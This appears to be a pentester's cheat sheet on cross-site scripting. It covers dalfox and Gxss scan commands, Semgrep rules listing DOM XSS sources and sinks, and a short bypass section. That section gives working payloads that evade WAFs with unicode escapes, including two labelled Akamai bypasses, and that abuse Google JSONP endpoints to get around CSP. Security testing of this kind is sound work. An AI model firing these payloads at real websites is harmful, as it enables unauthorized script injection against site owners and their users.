XSS
# https://github.com/hahwul/dalfox
dalfox url http://example.com
cat urls | dalfox pipe - --skip-bav --skip-mining-all
Find reflected parameters that could lead to XSS with Gxss
# https://github.com/KathanP19/Gxss
cat list | Gxss -c 100 -p REPLACE_STRING
Semgrep
Semgrep can be used to detect sink and sources and assist in XSS detection.
Usage
Download javascript files and beautify them (See Javascript), then run semgrep with
semgrep -c xss.yaml scripts/*
Hold down!
Javascript files must be beautified, otherwise semgrep will no work properly.
rules:
- id: domxss-insertAdjacentHTML
languages:
- javascript
- typescript
message: Found dangerous HTML output
pattern-either:
- pattern: document.location.search = ...
- pattern: document.location.hash = ...
- pattern: document.location.pathname = ...
- pattern: window.location.search = ...
- pattern: window.location.hash = ...
- pattern: window.location.pathname = ...
- pattern: document.URL = ...
- pattern: document.documentURI = ...
- pattern: document.baseURI = ...
- pattern: document.cookie = ...
- pattern: document.referrer = ...
- pattern: $X.insertAdjacentHTML(...)
- pattern: $X.innerHTML(...)
- pattern: $X.innerHTML = ...
- pattern: eval(...)
- pattern: execScript
- pattern: script.src = ...
- pattern: iframe.src = ...
- pattern: document.location = ...
- pattern: window.location = ...
- pattern: document.location.href = ...
- pattern: window.location.href = ...
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: $X.outerHTML = ...
- pattern: $X.outerHTML(...)
severity: WARNING
rules:
- id: domxss-insertAdjacentHTML
languages:
- javascript
- typescript
message: Found dangerous HTML output
mode: taint
pattern-sources:
- pattern: document.location.search
- pattern: document.location.hash
- pattern: document.location.pathname
- pattern: document.location.href
- pattern: document.location
- pattern: window.location
- pattern: window.location.href
- pattern: window.location.search
- pattern: window.location.hash
- pattern: window.location.pathname
- pattern: document.URL
- pattern: document.documentURI
- pattern: document.baseURI
- pattern: document.cookie
- pattern: document.referrer
pattern-sinks:
- pattern: $X.insertAdjacentHTML(...)
- pattern: $X.innerHTML(...)
- pattern: $X.innerHTML = ...
- pattern: eval(...)
- pattern: execScript
- pattern: script.src = ...
- pattern: iframe.src = ...
- pattern: document.location = ...
- pattern: window.location = ...
- pattern: document.location.href = ...
- pattern: window.location.href = ...
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: $X.outerHTML = ...
- pattern: $X.outerHTML(...)
severity: WARNING
Markdown
Markdown parsers can lead to XSS
Bypass
Try to encode characters with unicode to achieve WAF bypass
alert(1) would become ale\u{72}t(1\x29, where
\u{72} is unicode to r \x29 is unicode to )
Akamai Bypass
Sometimes works:
"><a/\test="%26quot"href=%27javascript:/**/;\ale\u{72}t(11111\x29");%27>Click
"><a/\test="%26quot;x%26quot;"href=%27javascript:/**/;location.assign("google.com")%27>Click</a>
CSP Bypass
If the site has google whitelisted, the following could be used:
www[.]google[.]com/complete/search?client=chrome&q=1&jsonp=alert(1)//
accounts[.]google[.]com/o/oauth2/revoke?callback=alert(1337)
Cool resources
| URL | Description |
|---|---|
| https://xss.pwnfunction.com/ | pwnfunction XSS game |
| https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms | Bypass Mechanisms |
| https://htmlparse.hackaplaneten.se/ | Parser Issues |